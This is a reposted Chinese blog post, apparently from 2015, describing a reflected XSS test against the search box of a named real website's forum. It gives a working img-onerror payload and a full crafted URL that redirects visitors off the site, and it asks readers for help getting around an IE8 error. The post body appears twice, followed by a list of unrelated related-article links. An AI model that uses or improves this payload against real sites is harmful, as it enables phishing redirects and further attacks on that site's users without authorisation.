xss渗透试验(3)
2015-01-13 15:38
183 查看
工具:appscan
站点:www.talk915.com
浏览器:IE8,firefox
方法:<img> on[b]error方法[/b]
浏览器不能够直接执行,这种通过第二次点击来实现渗透,效率非常低,最好是给出一个url,本来以为是进入talk915的,却自动跳转到另外一个网站。
应该怎么做呢?其中在本例中,我们用得最多的标签的就是<a>, <img>,我们到www.w3school.com.cn看一下它们的手册,发现<img>的onerror对象句柄没有使用。
http://www.w3school.com.cn/jsref/dom_obj_image.asp
假如,我们在
http://www.talk915.com/forum/forum_community.action
的搜索框里填入
1234"><img src=@onerror=window.location.assign("http://www.bing.com")>
结果会怎样?
因为<img>引用src的位置@,是不存在,按照手册来说,它会执行onerror这一段。也就是把浏览器地址栏输入
http://www.bing.com
用IE8,firefox来尝试,都能够跳转到bing
拼接url:
http://www.talk915.com/forum/forum_community.action?struts.token.name=token&token=G2TQIXRNK8P5ZD8YNR6A2YHST2P0JU7W&title=&author=&content=&titles=&titleType=&forumId=&orderBy=&excellent=&selectTitle=&page.currentPage=1&postForumId=&postContent=&postAdd=&postId=&oldForumId=&openPost=&postAudio=&postAudioLength=&postStatus=&img_url_length=64&expression_url_length=46&upload_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsDownload%3FFILE_ID%3D&pathUrl=http%3A%2F%2Fwww.talk915.com%3A80%2F&userToken=&searchWhere=1234%22%3e%3cimg+src%3d%40+onerror%3dwindow.location.assign(%22http%3a%2f%2fwww.bing.com%22)%3e&forumListId=4&selectForumId=1&postTitle=1234
但IE8仍然会报错无法跳转,firefox没问题。
[b]希望牛人帮忙看看怎么突破IE8这个报错。谢谢。
[/b]
站点:www.talk915.com
浏览器:IE8,firefox
方法:<img> on[b]error方法[/b]
浏览器不能够直接执行,这种通过第二次点击来实现渗透,效率非常低,最好是给出一个url,本来以为是进入talk915的,却自动跳转到另外一个网站。
应该怎么做呢?其中在本例中,我们用得最多的标签的就是<a>, <img>,我们到www.w3school.com.cn看一下它们的手册,发现<img>的onerror对象句柄没有使用。
http://www.w3school.com.cn/jsref/dom_obj_image.asp
假如,我们在
http://www.talk915.com/forum/forum_community.action
的搜索框里填入
1234"><img src=@onerror=window.location.assign("http://www.bing.com")>
结果会怎样?
因为<img>引用src的位置@,是不存在,按照手册来说,它会执行onerror这一段。也就是把浏览器地址栏输入
http://www.bing.com
用IE8,firefox来尝试,都能够跳转到bing
拼接url:
http://www.talk915.com/forum/forum_community.action?struts.token.name=token&token=G2TQIXRNK8P5ZD8YNR6A2YHST2P0JU7W&title=&author=&content=&titles=&titleType=&forumId=&orderBy=&excellent=&selectTitle=&page.currentPage=1&postForumId=&postContent=&postAdd=&postId=&oldForumId=&openPost=&postAudio=&postAudioLength=&postStatus=&img_url_length=64&expression_url_length=46&upload_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsDownload%3FFILE_ID%3D&pathUrl=http%3A%2F%2Fwww.talk915.com%3A80%2F&userToken=&searchWhere=1234%22%3e%3cimg+src%3d%40+onerror%3dwindow.location.assign(%22http%3a%2f%2fwww.bing.com%22)%3e&forumListId=4&selectForumId=1&postTitle=1234
但IE8仍然会报错无法跳转,firefox没问题。
[b]希望牛人帮忙看看怎么突破IE8这个报错。谢谢。
[/b]
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 一段非常好的滑动门[可感应触发或点击触发]兼容IE7 IE6 FireFox Opera
- IE8发布与“.中国”域名系统启用日期不谋而合?
- Firefox 之不传秘籍
- Search Engine XSS Worm
- div flash firefox div层总是被flash层遮盖
- Internet Explorer 8 官方下载
- Firefox 便携版 Portable Firefox v2.0.0.6 简体中文版 下载
- firefox下rowspan+border+border-collapse的bug
- firefox的超链接点击去除扩大的难看虚线的解决方法
- word-wrap在firefox中不起作用的解决方法
- Firefox返回时Iframe的显示Bug的解决方法
- 有关于IE8 Beta 1两个提醒
- Internet Explorer 8 beta 中文版与IE7共存的解决方法
- 多浏览器下IE6 IE7 firefox li 间距问题第1/2页
- javascript兼容firefox的文本输入长度提示
- 解析IE, FireFox, Opera 浏览器支持Alpha透明的方法
- Firefox下样式设置宽度奇怪现象
- firefox css自动换行的实现方法
- firefox 扩展开发技巧
- 用JavaScript限制textarea输入长度 (For: IE、Firefox ...)[